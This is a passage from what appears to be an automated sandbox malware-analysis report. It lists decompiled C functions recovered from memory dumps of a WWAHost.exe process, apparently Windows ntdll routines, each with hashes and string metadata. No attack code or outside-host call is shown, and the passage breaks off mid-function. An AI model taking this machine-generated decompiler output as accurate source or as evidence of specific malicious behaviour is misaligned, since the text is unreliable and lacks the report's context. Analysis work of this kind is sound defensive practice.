                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `
                                              • API String ID: 0-2679148245
                                              • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                              • Instruction ID: 47d3614a22e0ee174fe5824aeededb969b660ca635abb00c40987e90251c7767
                                              • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                              • Instruction Fuzzy Hash: 5431E2322007156BE720DF28CD45F9BBBE9ABC4754F08422AF9549B280E7B4E914C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 72%
                                              			E039D3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                              				char _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr* _v16;
                                              				char* _v20;
                                              				short _v22;
                                              				char _v24;
                                              				intOrPtr _t38;
                                              				short _t40;
                                              				short _t41;
                                              				void* _t44;
                                              				intOrPtr _t47;
                                              				void* _t48;
                                              
                                              				_v16 = __edx;
                                              				_t40 = 0x14;
                                              				_v24 = _t40;
                                              				_t41 = 0x16;
                                              				_v22 = _t41;
                                              				_t38 = 0;
                                              				_v12 = __ecx;
                                              				_push( &_v8);
                                              				_push(0);
                                              				_push(0);
                                              				_push(2);
                                              				_t43 =  &_v24;
                                              				_v20 = L"BinaryName";
                                              				_push( &_v24);
                                              				_push(__ecx);
                                              				_t47 = 0;
                                              				_t48 = E03999650();
                                              				if(_t48 >= 0) {
                                              					_t48 = 0xc000090b;
                                              				}
                                              				if(_t48 != 0xc0000023) {
                                              					_t44 = 0;
                                              					L13:
                                              					if(_t48 < 0) {
                                              						L16:
                                              						if(_t47 != 0) {
                                              							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                              						}
                                              						L18:
                                              						return _t48;
                                              					}
                                              					 *_v16 = _t38;
                                              					 *_a4 = _t47;
                                              					goto L18;
                                              				}
                                              				_t47 = L03974620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                              				if(_t47 != 0) {
                                              					_push( &_v8);
                                              					_push(_v8);
                                              					_push(_t47);
                                              					_push(2);
                                              					_push( &_v24);
                                              					_push(_v12);
                                              					_t48 = E03999650();
                                              					if(_t48 < 0) {
                                              						_t44 = 0;
                                              						goto L16;
                                              					}
                                              					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                              						_t48 = 0xc000090b;
                                              					}
                                              					_t44 = 0;
                                              					if(_t48 < 0) {
                                              						goto L16;
                                              					} else {
                                              						_t17 = _t47 + 0xc; // 0xc
                                              						_t38 = _t17;
                                              						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                              							_t48 = 0xc000090b;
                                              						}
                                              						goto L13;
                                              					}
                                              				}
                                              				_t48 = _t48 + 0xfffffff4;
                                              				goto L18;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: BinaryName
                                              • API String ID: 2994545307-215506332
                                              • Opcode ID: 6521e2f5a1099bd7a092bec83256e55b7665e837a616e6a1d36b0c1f9810c6c5
                                              • Instruction ID: a46c8b4bd02cb73ec6604707a21459e9ee110b7ca96e7d032a728899d5a039c2
                                              • Opcode Fuzzy Hash: 6521e2f5a1099bd7a092bec83256e55b7665e837a616e6a1d36b0c1f9810c6c5
                                              • Instruction Fuzzy Hash: B231053AD00609EFDB15DB58C986E7FF778EB80760F058169E806AB280D7309E00C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 33%
                                              			E0398D294(void* __ecx, char __edx, void* __eflags) {
                                              				signed int _v8;
                                              				char _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				intOrPtr _v64;
                                              				char* _v68;
                                              				intOrPtr _v72;
                                              				char _v76;
                                              				signed int _v84;
                                              				intOrPtr _v88;
                                              				char _v92;
                                              				intOrPtr _v96;
                                              				intOrPtr _v100;
                                              				char _v104;
                                              				char _v105;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int _t35;
                                              				char _t38;
                                              				signed int _t40;
                                              				signed int _t44;
                                              				signed int _t52;
                                              				void* _t53;
                                              				void* _t55;
                                              				void* _t61;
                                              				intOrPtr _t62;
                                              				void* _t64;
                                              				signed int _t65;
                                              				signed int _t66;
                                              
                                              				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                              				_v8 =  *0x3a4d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                              				_v105 = __edx;
                                              				_push( &_v92);
                                              				_t52 = 0;
                                              				_push(0);
                                              				_push(0);
                                              				_push( &_v104);
                                              				_push(0);
                                              				_t59 = __ecx;
                                              				_t55 = 2;
                                              				if(E03974120(_t55, __ecx) < 0) {
                                              					_t35 = 0;
                                              					L8:
                                              					_pop(_t61);
                                              					_pop(_t64);
                                              					_pop(_t53);
                                              					return E0399B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                              				}
                                              				_v96 = _v100;
                                              				_t38 = _v92;
                                              				if(_t38 != 0) {
                                              					_v104 = _t38;
                                              					_v100 = _v88;
                                              					_t40 = _v84;
                                              				} else {
                                              					_t40 = 0;
                                              				}
                                              				_v72 = _t40;
                                              				_v68 =  &_v104;
                                              				_push( &_v52);
                                              				_v76 = 0x18;
                                              				_push( &_v76);
                                              				_v64 = 0x40;
                                              				_v60 = _t52;
                                              				_v56 = _t52;
                                              				_t44 = E039998D0();
                                              				_t62 = _v88;
                                              				_t65 = _t44;
                                              				if(_t62 != 0) {
                                              					asm("lock xadd [edi], eax");
                                              					if((_t44 | 0xffffffff) != 0) {
                                              						goto L4;
                                              					}
                                              					_push( *((intOrPtr*)(_t62 + 4)));
                                              					E039995D0();
                                              					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                              					goto L4;
                                              				} else {
                                              					L4:
                                              					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                              					if(_t65 >= 0) {
                                              						_t52 = 1;
                                              					} else {
                                              						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                              							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                              						}
                                              					}
                                              					_t35 = _t52;
                                              					goto L8;
                                              				}
                                              			}


































                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: f8d48da80cdedd4f759d4d855179c9690f83bdd5735fd8e72ad83cd3e2f1f0cc
                                              • Instruction ID: f5ee2826202cc9f22d4785da58feafd7f3aeb497ec5737b048608905d1c14bec
                                              • Opcode Fuzzy Hash: f8d48da80cdedd4f759d4d855179c9690f83bdd5735fd8e72ad83cd3e2f1f0cc
                                              • Instruction Fuzzy Hash: 9631C2B55083059FC711EF28C880A6BBBECEBC5698F04092FF99497290D734DD05CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 72%
                                              			E03961B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                              				intOrPtr _v8;
                                              				char _v16;
                                              				intOrPtr* _t26;
                                              				intOrPtr _t29;
                                              				void* _t30;
                                              				signed int _t31;
                                              
                                              				_t27 = __ecx;
                                              				_t29 = __edx;
                                              				_t31 = 0;
                                              				_v8 = __edx;
                                              				if(__edx == 0) {
                                              					L18:
                                              					_t30 = 0xc000000d;
                                              					goto L12;
                                              				} else {
                                              					_t26 = _a4;
                                              					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                              						goto L18;
                                              					} else {
                                              						E0399BB40(__ecx,  &_v16, __ecx);
                                              						_push(_t26);
                                              						_push(0);
                                              						_push(0);
                                              						_push(_t29);
                                              						_push( &_v16);
                                              						_t30 = E0399A9B0();
                                              						if(_t30 >= 0) {
                                              							_t19 =  *_t26;
                                              							if( *_t26 != 0) {
                                              								goto L7;
                                              							} else {
                                              								 *_a8 =  *_a8 & 0;
                                              							}
                                              						} else {
                                              							if(_t30 != 0xc0000023) {
                                              								L9:
                                              								_push(_t26);
                                              								_push( *_t26);
                                              								_push(_t31);
                                              								_push(_v8);
                                              								_push( &_v16);
                                              								_t30 = E0399A9B0();
                                              								if(_t30 < 0) {
                                              									L12:
                                              									if(_t31 != 0) {
                                              										L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                              									}
                                              								} else {
                                              									 *_a8 = _t31;
                                              								}
                                              							} else {
                                              								_t19 =  *_t26;
                                              								if( *_t26 == 0) {
                                              									_t31 = 0;
                                              								} else {
                                              									L7:
                                              									_t31 = L03974620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                              								}
                                              								if(_t31 == 0) {
                                              									_t30 = 0xc0000017;
                                              								} else {
                                              									goto L9;
                                              								}
                                              							}
                                              						}
                                              					}
                                              				}
                                              				return _t30;
                                              			}










                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: WindowsExcludedProcs
                                              • API String ID: 0-3583428290
                                              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                              • Instruction ID: 9ead69380b93a820a87005bbf7ce7c12b9a7d01ea3eb5200f754c70900084be4
                                              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                              • Instruction Fuzzy Hash: 4021F977502628ABDF21DA99C941FAFB7BDEFC1A91F094566FD049B200D638DD00D7A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0397F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                              				intOrPtr _t13;
                                              				intOrPtr _t14;
                                              				signed int _t16;
                                              				signed char _t17;
                                              				intOrPtr _t19;
                                              				intOrPtr _t21;
                                              				intOrPtr _t23;
                                              				intOrPtr* _t25;
                                              
                                              				_t25 = _a8;
                                              				_t17 = __ecx;
                                              				if(_t25 == 0) {
                                              					_t19 = 0xc00000f2;
                                              					L8:
                                              					return _t19;
                                              				}
                                              				if((__ecx & 0xfffffffe) != 0) {
                                              					_t19 = 0xc00000ef;
                                              					goto L8;
                                              				}
                                              				_t19 = 0;
                                              				 *_t25 = 0;
                                              				_t21 = 0;
                                              				_t23 = "Actx ";
                                              				if(__edx != 0) {
                                              					if(__edx == 0xfffffffc) {
                                              						L21:
                                              						_t21 = 0x200;
                                              						L5:
                                              						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                              						 *_t25 = _t13;
                                              						L6:
                                              						if(_t13 == 0) {
                                              							if((_t17 & 0x00000001) != 0) {
                                              								 *_t25 = _t23;
                                              							}
                                              						}
                                              						L7:
                                              						goto L8;
                                              					}
                                              					if(__edx == 0xfffffffd) {
                                              						 *_t25 = _t23;
                                              						_t13 = _t23;
                                              						goto L6;
                                              					}
                                              					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                              					 *_t25 = _t13;
                                              					L14:
                                              					if(_t21 == 0) {
                                              						goto L6;
                                              					}
                                              					goto L5;
                                              				}
                                              				_t14 = _a4;
                                              				if(_t14 != 0) {
                                              					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                              					if(_t16 <= 1) {
                                              						_t21 = 0x1f8;
                                              						_t13 = 0;
                                              						goto L14;
                                              					}
                                              					if(_t16 == 2) {
                                              						goto L21;
                                              					}
                                              					if(_t16 != 4) {
                                              						_t19 = 0xc00000f0;
                                              						goto L7;
                                              					}
                                              					_t13 = 0;
                                              					goto L6;
                                              				} else {
                                              					_t21 = 0x1f8;
                                              					goto L5;
                                              				}
                                              			}












                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx
                                              • API String ID: 0-89312691
                                              • Opcode ID: f257e5dbebc0542da24ee502b5714f825bf8f1fda662f600105a765d214f880e
                                              • Instruction ID: 7b02696ea7dd77ca73f6c8ca27c43a60e4d73644f1f014e3e64d30a9f217fe8f
                                              • Opcode Fuzzy Hash: f257e5dbebc0542da24ee502b5714f825bf8f1fda662f600105a765d214f880e
                                              • Instruction Fuzzy Hash: 9F11B6353087028BEB25CE1D88917F6B2DDEB867A4F29492EE467EB3D1DB70C8408741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 71%
                                              			E03A08DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                              				intOrPtr _t35;
                                              				void* _t41;
                                              
                                              				_t40 = __esi;
                                              				_t39 = __edi;
                                              				_t38 = __edx;
                                              				_t35 = __ecx;
                                              				_t34 = __ebx;
                                              				_push(0x74);
                                              				_push(0x3a30d50);
                                              				E039AD0E8(__ebx, __edi, __esi);
                                              				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                              				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                              				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                              					E039E5720(0x65, 0, "Critical error detected %lx\n", _t35);
                                              					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                              						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                              						asm("int3");
                                              						 *(_t41 - 4) = 0xfffffffe;
                                              					}
                                              				}
                                              				 *(_t41 - 4) = 1;
                                              				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                              				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                              				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                              				 *((intOrPtr*)(_t41 - 0x64)) = L039ADEF0;
                                              				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                              				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                              				_push(_t41 - 0x70);
                                              				L039ADEF0(1, _t38);
                                              				 *(_t41 - 4) = 0xfffffffe;
                                              				return E039AD130(_t34, _t39, _t40);
                                              			}






                                              Strings
                                              • Critical error detected %lx, xrefs: 03A08E21
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Critical error detected %lx
                                              • API String ID: 0-802127002
                                              • Opcode ID: 1e62e99656c2d7387417b624675424a762fa2ad68d9afe50bb2ddd049e308bc8
                                              • Instruction ID: 451c9bbc0fdc01385ff0f2f2f653074d25462e260ae78381befa69d7dea527da
                                              • Opcode Fuzzy Hash: 1e62e99656c2d7387417b624675424a762fa2ad68d9afe50bb2ddd049e308bc8
                                              • Instruction Fuzzy Hash: 79117975D00748DADB24CFA8990579DBBB4BB04714F24425ED029AB282C3344601CF19
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 039EFF60
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                              • API String ID: 0-1911121157
                                              • Opcode ID: 30dd66f0f42da0e7f74eb47a925274f04be6004d616b64cf00ac9f13516d7c86
                                              • Instruction ID: ac8c279dacb85c166fdff44f09523d3b3ad320f53e139cd3374b1df94dece8fd
                                              • Opcode Fuzzy Hash: 30dd66f0f42da0e7f74eb47a925274f04be6004d616b64cf00ac9f13516d7c86
                                              • Instruction Fuzzy Hash: 94112279910644EFCF12EF54C848F9CBBB1FF89704F1A8854F00A6B6A1C7399940DB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 88%
                                              			E03A25BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                              				signed int _t296;
                                              				signed char _t298;
                                              				signed int _t301;
                                              				signed int _t306;
                                              				signed int _t310;
                                              				signed char _t311;
                                              				intOrPtr _t312;
                                              				signed int _t313;
                                              				void* _t327;
                                              				signed int _t328;
                                              				intOrPtr _t329;
                                              				intOrPtr _t333;
                                              				signed char _t334;
                                              				signed int _t336;
                                              				void* _t339;
                                              				signed int _t340;
                                              				signed int _t356;
                                              				signed int _t362;
                                              				short _t367;
                                              				short _t368;
                                              				short _t373;
                                              				signed int _t380;
                                              				void* _t382;
                                              				short _t385;
                                              				signed short _t392;
                                              				signed char _t393;
                                              				signed int _t395;
                                              				signed char _t397;
                                              				signed int _t398;
                                              				signed short _t402;
                                              				void* _t406;
                                              				signed int _t412;
                                              				signed char _t414;
                                              				signed short _t416;
                                              				signed int _t421;
                                              				signed char _t427;
                                              				intOrPtr _t434;
                                              				signed char _t435;
                                              				signed int _t436;
                                              				signed int _t442;
                                              				signed int _t446;
                                              				signed int _t447;
                                              				signed int _t451;
                                              				signed int _t453;
                                              				signed int _t454;
                                              				signed int _t455;
                                              				intOrPtr _t456;
                                              				intOrPtr* _t457;
                                              				short _t458;
                                              				signed short _t462;
                                              				signed int _t469;
                                              				intOrPtr* _t474;
                                              				signed int _t475;
                                              				signed int _t479;
                                              				signed int _t480;
                                              				signed int _t481;
                                              				short _t485;
                                              				signed int _t491;
                                              				signed int* _t494;
                                              				signed int _t498;
                                              				signed int _t505;
                                              				intOrPtr _t506;
                                              				signed short _t508;
                                              				signed int _t511;
                                              				void* _t517;
                                              				signed int _t519;
                                              				signed int _t522;
                                              				void* _t523;
                                              				signed int _t524;
                                              				void* _t528;
                                              				signed int _t529;
                                              
                                              				_push(0xd4);
                                              				_push(0x3a31178);
                                              				E039AD0E8(__ebx, __edi, __esi);
                                              				_t494 = __edx;
                                              				 *(_t528 - 0xcc) = __edx;
                                              				_t511 = __ecx;
                                              				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                              				 *(_t528 - 0xbc) = __ecx;
                                              				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                              				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                              				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                              				_t427 = 0;
                                              				 *(_t528 - 0x74) = 0;
                                              				 *(_t528 - 0x9c) = 0;
                                              				 *(_t528 - 0x84) = 0;
                                              				 *(_t528 - 0xac) = 0;
                                              				 *(_t528 - 0x88) = 0;
                                              				 *(_t528 - 0xa8) = 0;
                                              				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                              				if( *(_t528 + 0x1c) <= 0x80) {
                                              					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                              					if(__eflags != 0) {
                                              						_t421 = E03A24C56(0, __edx, __ecx, __eflags);
                                              						__eflags = _t421;
                                              						if(_t421 != 0) {
                                              							 *((intOrPtr*)(_t528 - 4)) = 0;
                                              							E0399D000(0x410);
                                              							 *(_t528 - 0x18) = _t529;
                                              							 *(_t528 - 0x9c) = _t529;
                                              							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                              							E03A25542(_t528 - 0x9c, _t528 - 0x84);
                                              						}
                                              					}
                                              					_t435 = _t427;
                                              					 *(_t528 - 0xd0) = _t435;
                                              					_t474 = _t511 + 0x65;
                                              					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                              					_t511 = 0x18;
                                              					while(1) {
                                              						 *(_t528 - 0xa0) = _t427;
                                              						 *(_t528 - 0xbc) = _t427;
                                              						 *(_t528 - 0x80) = _t427;
                                              						 *(_t528 - 0x78) = 0x50;
                                              						 *(_t528 - 0x79) = _t427;
                                              						 *(_t528 - 0x7a) = _t427;
                                              						 *(_t528 - 0x8c) = _t427;
                                              						 *(_t528 - 0x98) = _t427;
                                              						 *(_t528 - 0x90) = _t427;
                                              						 *(_t528 - 0xb0) = _t427;
                                              						 *(_t528 - 0xb8) = _t427;
                                              						_t296 = 1 << _t435;
                                              						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                              						__eflags = _t436 & _t296;
                                              						if((_t436 & _t296) != 0) {
                                              							goto L92;
                                              						}
                                              						__eflags =  *((char*)(_t474 - 1));
                                              						if( *((char*)(_t474 - 1)) == 0) {
                                              							goto L92;
                                              						}
                                              						_t301 =  *_t474;
                                              						__eflags = _t494[1] - _t301;
                                              						if(_t494[1] <= _t301) {
                                              							L10:
                                              							__eflags =  *(_t474 - 5) & 0x00000040;
                                              							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                              								L12:
                                              								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                              								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                              									goto L92;
                                              								}
                                              								_t442 =  *(_t474 - 0x11) & _t494[3];
                                              								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                              								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                              									goto L92;
                                              								}
                                              								__eflags = _t442 -  *(_t474 - 0x11);
                                              								if(_t442 !=  *(_t474 - 0x11)) {
                                              									goto L92;
                                              								}
                                              								L15:
                                              								_t306 =  *(_t474 + 1) & 0x000000ff;
                                              								 *(_t528 - 0xc0) = _t306;
                                              								 *(_t528 - 0xa4) = _t306;
                                              								__eflags =  *0x3a460e8;
                                              								if( *0x3a460e8 != 0) {
                                              									__eflags = _t306 - 0x40;
                                              									if(_t306 < 0x40) {
                                              										L20:
                                              										asm("lock inc dword [eax]");
                                              										_t310 =  *0x3a460e8; // 0x0
                                              										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                              										__eflags = _t311 & 0x00000001;
                                              										if((_t311 & 0x00000001) == 0) {
                                              											 *(_t528 - 0xa0) = _t311;
                                              											_t475 = _t427;
                                              											 *(_t528 - 0x74) = _t427;
                                              											__eflags = _t475;
                                              											if(_t475 != 0) {
                                              												L91:
                                              												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                              												goto L92;
                                              											}
                                              											asm("sbb edi, edi");
                                              											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                              											_t511 = _t498;
                                              											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                              											__eflags =  *(_t312 - 5) & 1;
                                              											if(( *(_t312 - 5) & 1) != 0) {
                                              												_push(_t528 - 0x98);
                                              												_push(0x4c);
                                              												_push(_t528 - 0x70);
                                              												_push(1);
                                              												_push(0xfffffffa);
                                              												_t412 = E03999710();
                                              												_t475 = _t427;
                                              												__eflags = _t412;
                                              												if(_t412 >= 0) {
                                              													_t414 =  *(_t528 - 0x98) - 8;
                                              													 *(_t528 - 0x98) = _t414;
                                              													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                              													 *(_t528 - 0x8c) = _t416;
                                              													 *(_t528 - 0x79) = 1;
                                              													_t511 = (_t416 & 0x0000ffff) + _t498;
                                              													__eflags = _t511;
                                              												}
                                              											}
                                              											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                              											__eflags = _t446 & 0x00000004;
                                              											if((_t446 & 0x00000004) != 0) {
                                              												__eflags =  *(_t528 - 0x9c);
                                              												if( *(_t528 - 0x9c) != 0) {
                                              													 *(_t528 - 0x7a) = 1;
                                              													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                              													__eflags = _t511;
                                              												}
                                              											}
                                              											_t313 = 2;
                                              											_t447 = _t446 & _t313;
                                              											__eflags = _t447;
                                              											 *(_t528 - 0xd4) = _t447;
                                              											if(_t447 != 0) {
                                              												_t406 = 0x10;
                                              												_t511 = _t511 + _t406;
                                              												__eflags = _t511;
                                              											}
                                              											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                              											 *(_t528 - 0x88) = _t427;
                                              											__eflags =  *(_t528 + 0x1c);
                                              											if( *(_t528 + 0x1c) <= 0) {
                                              												L45:
                                              												__eflags =  *(_t528 - 0xb0);
                                              												if( *(_t528 - 0xb0) != 0) {
                                              													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                              													__eflags = _t511;
                                              												}
                                              												__eflags = _t475;
                                              												if(_t475 != 0) {
                                              													asm("lock dec dword [ecx+edx*8+0x4]");
                                              													goto L100;
                                              												} else {
                                              													_t494[3] = _t511;
                                              													_t451 =  *(_t528 - 0xa0);
                                              													_t427 = E03996DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                              													 *(_t528 - 0x88) = _t427;
                                              													__eflags = _t427;
                                              													if(_t427 == 0) {
                                              														__eflags = _t511 - 0xfff8;
                                              														if(_t511 <= 0xfff8) {
                                              															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                              															asm("sbb ecx, ecx");
                                              															__eflags = (_t451 & 0x000000e2) + 8;
                                              														}
                                              														asm("lock dec dword [eax+edx*8+0x4]");
                                              														L100:
                                              														goto L101;
                                              													}
                                              													_t453 =  *(_t528 - 0xa0);
                                              													 *_t494 = _t453;
                                              													_t494[1] = _t427;
                                              													_t494[2] =  *(_t528 - 0xbc);
                                              													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                              													 *_t427 =  *(_t453 + 0x24) | _t511;
                                              													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                              													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                              													asm("movsd");
                                              													asm("movsd");
                                              													asm("movsd");
                                              													asm("movsd");
                                              													asm("movsd");
                                              													asm("movsd");
                                              													asm("movsd");
                                              													asm("movsd");
                                              													__eflags =  *(_t528 + 0x14);
                                              													if( *(_t528 + 0x14) == 0) {
                                              														__eflags =  *[fs:0x18] + 0xf50;
                                              													}
                                              													asm("movsd");
                                              													asm("movsd");
                                              													asm("movsd");
                                              													asm("movsd");
                                              													__eflags =  *(_t528 + 0x18);
                                              													if( *(_t528 + 0x18) == 0) {
                                              														_t454 =  *(_t528 - 0x80);
                                              														_t479 =  *(_t528 - 0x78);
                                              														_t327 = 1;
                                              														__eflags = 1;
                                              													} else {
                                              														_t146 = _t427 + 0x50; // 0x50
                                              														_t454 = _t146;
                                              														 *(_t528 - 0x80) = _t454;
                                              														_t382 = 0x18;
                                              														 *_t454 = _t382;
                                              														 *((short*)(_t454 + 2)) = 1;
                                              														_t385 = 0x10;
                                              														 *((short*)(_t454 + 6)) = _t385;
                                              														 *(_t454 + 4) = 0;
                                              														asm("movsd");
                                              														asm("movsd");
